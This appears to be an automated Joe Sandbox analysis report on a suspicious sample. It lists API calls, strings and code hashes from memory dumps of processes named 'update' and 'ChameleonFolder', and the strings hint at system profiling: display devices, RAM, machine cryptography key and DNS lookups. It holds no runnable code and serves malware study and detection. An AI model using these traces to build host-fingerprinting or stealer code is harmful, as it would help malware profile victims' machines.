                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 1a1e78d5433c9708098c6bc8c205f43e83ad122134c42980d47e7c9e79c26488
                                                                                                            • Instruction ID: e7bb21d7818b23da26e47d5e8aee7b9a5bdfdedc2a4558b21973e4c2dc324f20
                                                                                                            • Opcode Fuzzy Hash: 1a1e78d5433c9708098c6bc8c205f43e83ad122134c42980d47e7c9e79c26488
                                                                                                            • Instruction Fuzzy Hash: 01413571904108AFDB01FFA2D842ACDBBB9EF45309F51447BF505B36A2D63CAE068A24
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 0f6dc28d25e31742a3d83fd8ff35710f0af691a996f022fb8dd6efbb7f893fac
                                                                                                            • Instruction ID: 8afa6536208aa5b6f57682845dada9e2518f3e9b5e83f9eef4c4991f65faefc0
                                                                                                            • Opcode Fuzzy Hash: 0f6dc28d25e31742a3d83fd8ff35710f0af691a996f022fb8dd6efbb7f893fac
                                                                                                            • Instruction Fuzzy Hash: 7F414631900108AFDB01FF92D842ACDFBB9EF44309F50447BF504B36A2D63CAE058A14
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411078
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 960af96c6d180e36fedad193f267724433eed7366dc03900526dc00d0c7d43f2
                                                                                                            • Instruction ID: 086439bef84ae03ebcf91c6f71c22103effc3d3d1ef1d95b9ffc13b6feb758dd
                                                                                                            • Opcode Fuzzy Hash: 960af96c6d180e36fedad193f267724433eed7366dc03900526dc00d0c7d43f2
                                                                                                            • Instruction Fuzzy Hash: 53315531904108AFDB01FFA1D942ADDBBB9EF49304F50447BF504B36A2D738AE069A58
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411078
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 23a8ec0390782e8a3a87181899651e63f82f7ff95d198a39a33ed47c794eaa64
                                                                                                            • Instruction ID: c9e68ca033382928e780bbb2ca05a045859d404701f4d2a11d4424a3b4ff7e89
                                                                                                            • Opcode Fuzzy Hash: 23a8ec0390782e8a3a87181899651e63f82f7ff95d198a39a33ed47c794eaa64
                                                                                                            • Instruction Fuzzy Hash: FA313531900109AEDB01FF91D942ADDBBB9EF48305F50457BF504B26A2D738AE059A58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041763E,?,00000000,00000011,00000000), ref: 004175CD
                                                                                                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: DnsQuery_A$dnsapi.dll
                                                                                                            • API String ID: 2574300362-3847274415
                                                                                                            • Opcode ID: b21d0736972aa36b19cf06e066042d1d2d022ed966ff61fac985e7aef83e4a1a
                                                                                                            • Instruction ID: d30c321fe4a2bd247bd4b698bf20639808d2184671dfbaabedb686dc3f8753d1
                                                                                                            • Opcode Fuzzy Hash: b21d0736972aa36b19cf06e066042d1d2d022ed966ff61fac985e7aef83e4a1a
                                                                                                            • Instruction Fuzzy Hash: 76119070944644AED701DBB9CC52B9EBBF8DF49714F5140B7F804E72D2D6789E008B58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041763E,?,00000000,00000011,00000000), ref: 004175CD
                                                                                                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: DnsQuery_A$dnsapi.dll
                                                                                                            • API String ID: 2574300362-3847274415
                                                                                                            • Opcode ID: 513ae74a452d945e18968ac4004f5b6a56348936cd96268495f2825fd343ced3
                                                                                                            • Instruction ID: 89091d3917c39e027ec3eeccc89b87ee5cdcb6cd8aa522463c3fbed3da073618
                                                                                                            • Opcode Fuzzy Hash: 513ae74a452d945e18968ac4004f5b6a56348936cd96268495f2825fd343ced3
                                                                                                            • Instruction Fuzzy Hash: 68118FB1A44604AEDB11DFA9CD42B9EBBF8EB49714F5140BBF804E72D1D6789E008B58
APIs
• LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,00415E29,?,-00000001,?,?,?,00415F7F,Video Info,?,004160C8,?,GetRAM: ,?), ref: 00415D94
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00415D9A
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: EnumDisplayDevicesW$user32.dll
• API String ID: 2574300362-1693391355
• Opcode ID: e49b902f07a980a003c294d4dc7f468fc02d54e415eed80baa828219ab7e1142
• Instruction ID: 996778e6e1fa3012b08ba28900446386cc223bdcaff6e7a2921523f1031bab31
• Opcode Fuzzy Hash: e49b902f07a980a003c294d4dc7f468fc02d54e415eed80baa828219ab7e1142
• Instruction Fuzzy Hash: AD11B970A00A18DFD761DF61CC45BDABBBDEBC4705F1040FAE408A6291D6785F848A58
APIs
• LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041763E,?,00000000,00000011,00000000), ref: 004175CD
• GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175D3
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: DnsQuery_A$dnsapi.dll
• API String ID: 2574300362-3847274415
• Opcode ID: b5114bd0f2838a1c62086145bd7ce8d428bdae928ed29eadb9123bea7991a88f
• Instruction ID: b99d0aac83a0b3c72d6054ef8d9202edd35a9011c0e0381adc81f7c85d7bf011
• Opcode Fuzzy Hash: b5114bd0f2838a1c62086145bd7ce8d428bdae928ed29eadb9123bea7991a88f
• Instruction Fuzzy Hash: F41151B1A44608AED750DFA9CD42B9EBBF8EB48714F514477F904E72C1E6789E008B58
APIs
  • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
• 6BD67450.KERNEL32(00000000,00000000,00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C), ref: 0040E824
• 6BD677D0.KERNEL32(00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C,00000001,?), ref: 0040E866
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Similarity
• API ID: AllocD67450D677String
• String ID: %TEMP%\curbuf.dat
• API String ID: 3586935142-3767633259
• Opcode ID: a80c2e18994b5b251d51abf03e9ac8fefd6a39a3b9b2048d6b5d44808e33a571
• Instruction ID: 82a9ed53c2a697d02335697899508965461685f21aee0589c72fe3466f83eb79
• Opcode Fuzzy Hash: a80c2e18994b5b251d51abf03e9ac8fefd6a39a3b9b2048d6b5d44808e33a571
• Instruction Fuzzy Hash: 4D211271A00209EBDB00FBA6D94299EB7B8EF44309F50897BF400B32D1D738AE11965D
APIs
• RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
• RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
  • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
  • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
  • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
  • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: ^
• API String ID: 2227675388-551292248
• Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
• Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
• Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
• Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Control-flow Graph (graph image omitted; basic blocks 2aa9b9c-2aa9c74, calls CreateFileMappingW and MapViewOfFile)

APIs
• CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02AA9BC1
• MapViewOfFile.KERNELBASE(02AB350C,00000006,00000000,00000000,00000028,?), ref: 02AA9C04
Strings
• {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02AA9BB2
Memory Dump Source
• Source File: 00000016.00000002.2244116625.0000000002A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A21000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2a21000_ChameleonFolder.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
• API String ID: 3452162329-4124573863
• Opcode ID: d90a040c4f2990d04b8d942ded53de4baab1ae86a7f677fd1f99ac0b0d1d3b5a
• Instruction ID: 7055e5cd4775c1af6e299ba37a6992d7c534126aea15cc0e542c4bf60ea08189
• Opcode Fuzzy Hash: d90a040c4f2990d04b8d942ded53de4baab1ae86a7f677fd1f99ac0b0d1d3b5a
• Instruction Fuzzy Hash: FE213834AC4601EFDB12DFA8D995B0A77E6AF4A720F108695E510DB3A1CF70E851CF11

Control-flow Graph (graph image omitted; basic blocks 2aa988c-2aa9900, calls PostMessageW)

APIs
• PostMessageW.USER32(025E0000,02AB940C,?,?), ref: 02AA98D7
Memory Dump Source
• Source File: 00000016.00000002.2244116625.0000000002A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A21000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2a21000_ChameleonFolder.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: c393d234b624bbbee664fc133f04ec3e163974ae9c3a873a85983ef070d50672
• Instruction ID: ea4ef6da9a939624762299fe0663d42308763890a0ee4687cfe65f793dbe27d8
• Opcode Fuzzy Hash: c393d234b624bbbee664fc133f04ec3e163974ae9c3a873a85983ef070d50672
• Instruction Fuzzy Hash: 2F116375A40249EFCB40DF9CD980E9A77E9AF0D360B008545F918DB361CB30E951DF65
APIs
• GetThreadUILanguage.KERNEL32(?,00000000), ref: 02A19CE9
• SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02A19D47
• SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02A19DA4
• SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02A19DD7
  • Part of subcall function 02A19C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02A19D55), ref: 02A19CAB
  • Part of subcall function 02A19C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02A19D55), ref: 02A19CC8
Memory Dump Source
• Source File: 00000016.00000002.2244116625.0000000002A11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2a11000_ChameleonFolder.jbxd
Similarity
• API ID: Thread$LanguagesPreferred$Language
• String ID:
• API String ID: 2255706666-0
• Opcode ID: 53f204b2ebd43a88787451ffc932c3ab926ea079901bbfd9ed52cb18fca21762
• Instruction ID: f48c69d77f5b641d9e76844874a4c43bd19b902fa1fc63ac0f36653bd9530f8d
• Opcode Fuzzy Hash: 53f204b2ebd43a88787451ffc932c3ab926ea079901bbfd9ed52cb18fca21762
• Instruction Fuzzy Hash: F9315C70E4021A9BDF10EFE8C890AAFB7B9FF08324F404566D555E7295EF74AA05CB90